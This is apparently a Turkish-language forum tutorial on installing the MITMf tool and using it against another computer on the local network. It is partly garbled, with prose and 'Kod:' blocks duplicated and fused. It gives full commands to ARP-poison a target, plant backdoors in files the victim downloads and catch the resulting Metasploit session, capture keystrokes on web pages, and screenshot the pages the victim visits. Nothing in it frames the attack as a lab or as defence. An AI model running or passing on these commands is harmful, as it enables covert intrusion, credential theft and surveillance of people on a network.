Mitmf kurulumu
Başka Bir terminale
Gerekli Materyalleri kurduk manuel kurma sebebimiz tool kendisi kurarmuyor.
Şimdi github linkimizi clonelayalım
indirdiğimiz klasörün içerisindeki requirements.txt dosyasını kurun
Herşey bitti şuanda py uzantılı dosyamızı açabilriz.
Şimdi gelelim konularımıza
Ağdaki bilgisayarın indirdiği tüm dosyalara backdoor koyma .
Not = Httpli siteler
İlk olarak terminalimizde metasploit açalım
Burdaki passwordu kopyalıyoruz ve yeni bir terminal açıyoruz
Ben dosyayı leafpad ile aççağım siz ne ile açarsanız artık
Açılan leafpad penceremizde metasploit adı altında passwordlar port ayarları olcak ilk terminalde
yazarak aldığımız passwordu açılan leafpaddeki passwordun yerine yazarak kaydediyoruz . Eğer ben uğraşamam dersenizde
olarakda yazabilirsiniz. M
etasploitimiz arkada açıkken yeni bir terminal açıp şu komutları yazıyoruz
Şimdi bu kodu açalım yazdığımız komutlar ne işe yarıyormuş kendinize göre nasıl editlersiniz vs .
-i : Interface Belirtmemize Yarar (eth0, wlan0, enp2s0)
–spoof : Agı Dinlemeye Baslar.
–arp : Arp Poisoning Saldirisi Ile Trafigi Ustumuze Gecirir.
–gateway : Gateway IP Adresini Yazacagimiz Kısım
olarak öğrenebilirsiniz.
–target :Hedef IP Adresini Yazacagimiz Kısım.
evet şimdi ağ dinleniyor karşı kişi bilgisayarına indirdiği dosyaya backdoor yerleştirilcektir karşı bilgisayar dosyayı aktif hale getirdiğinde metasploitimize bilgirim gelcektir . geldikten sonra
yazarak bağlanıyoruz işte bu kadar şimdi karşı bilgisayara erişim sağladık .
Şimdi Keylogger özelliğine bakalım
–jskeylogger : Web Sayfasi Uzerinde Basilan Tus lari Algılamaya yarar.
kullancağımız komut budur isterseniz önceki komutun sonuna da ekleyip 2 faktörlü bir silaha dönüştürebilirsiniz.
yazarak bekliyoruz --spoof komutunu yazma sebebimizde hangi sitieye girdiği öğrenmek. Yani keylogger sayesinde aldığımız şifrenin hangi siteye ait olduğunu öğrenmek.
Şimdide karşı kişinin girdiği sayfanın jpg halini almak yani screen görüntü almamızı sağlıyacak komutumuz olan
kullanalım .
karşı kişi hangi sayfaya girerse
klasörüne kaydedilcektir.
Kullanımı kolay bir tooldur normalde bunları manuel olarak anlatcaktım ama aklıma mitmf geldi ne uğraşıyorum direk tool anlatımı yapayım dedim bende
Kod:
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
Kod:
pip install virtualenvwrapper
Kod:
source /usr/bin/virtualenvwrapper.sh
Kod:
source /usr/bin/virtualenvwrapper.sh
Kod:
mkvirtualenv MITMf -p /usr/bin/python2.7
Kod:
git clone https://github.com/byt3bl33d3r/MITMf.gitindirdiğimiz klasörün içerisindeki requirements.txt dosyasını kurun
Kod:
pip install -r requirements.txtŞimdi gelelim konularımıza
Ağdaki bilgisayarın indirdiği tüm dosyalara backdoor koyma .
Not = Httpli siteler
İlk olarak terminalimizde metasploit açalım
Kod:
msfconsole
Kod:
load msgrpc
Kod:
su -
Kod:
leafpad /usr/share/mitmf/config/mitmf.conf
Kod:
load msgrpc
Kod:
load msgrpc Pass=yenişifreetasploitimiz arkada açıkken yeni bir terminal açıp şu komutları yazıyoruz
Kod:
python mitmf.py -i wlan0 --arp --spoof --gateway 192.168.177.2 --target 192.168.177.33 --filepwn-i : Interface Belirtmemize Yarar (eth0, wlan0, enp2s0)
–spoof : Agı Dinlemeye Baslar.
–arp : Arp Poisoning Saldirisi Ile Trafigi Ustumuze Gecirir.
–gateway : Gateway IP Adresini Yazacagimiz Kısım
Kod:
route -n–target :Hedef IP Adresini Yazacagimiz Kısım.
evet şimdi ağ dinleniyor karşı kişi bilgisayarına indirdiği dosyaya backdoor yerleştirilcektir karşı bilgisayar dosyayı aktif hale getirdiğinde metasploitimize bilgirim gelcektir . geldikten sonra
Kod:
sessions -i 1Şimdi Keylogger özelliğine bakalım
–jskeylogger : Web Sayfasi Uzerinde Basilan Tus lari Algılamaya yarar.
kullancağımız komut budur isterseniz önceki komutun sonuna da ekleyip 2 faktörlü bir silaha dönüştürebilirsiniz.
Kod:
python mitmf.py -i wlan0 --arp --spoof --gateway 192.168.177.2 --target 192.168.177.33 --jskeyloggerŞimdide karşı kişinin girdiği sayfanın jpg halini almak yani screen görüntü almamızı sağlıyacak komutumuz olan
Kod:
--screen
Kod:
python mitmf.py -i wlan0 --arp --spoof --gateway 192.168.177.2 --target 192.168.177.33 --screen
Kod:
/var/log/mitmfKullanımı kolay bir tooldur normalde bunları manuel olarak anlatcaktım ama aklıma mitmf geldi ne uğraşıyorum direk tool anlatımı yapayım dedim bende
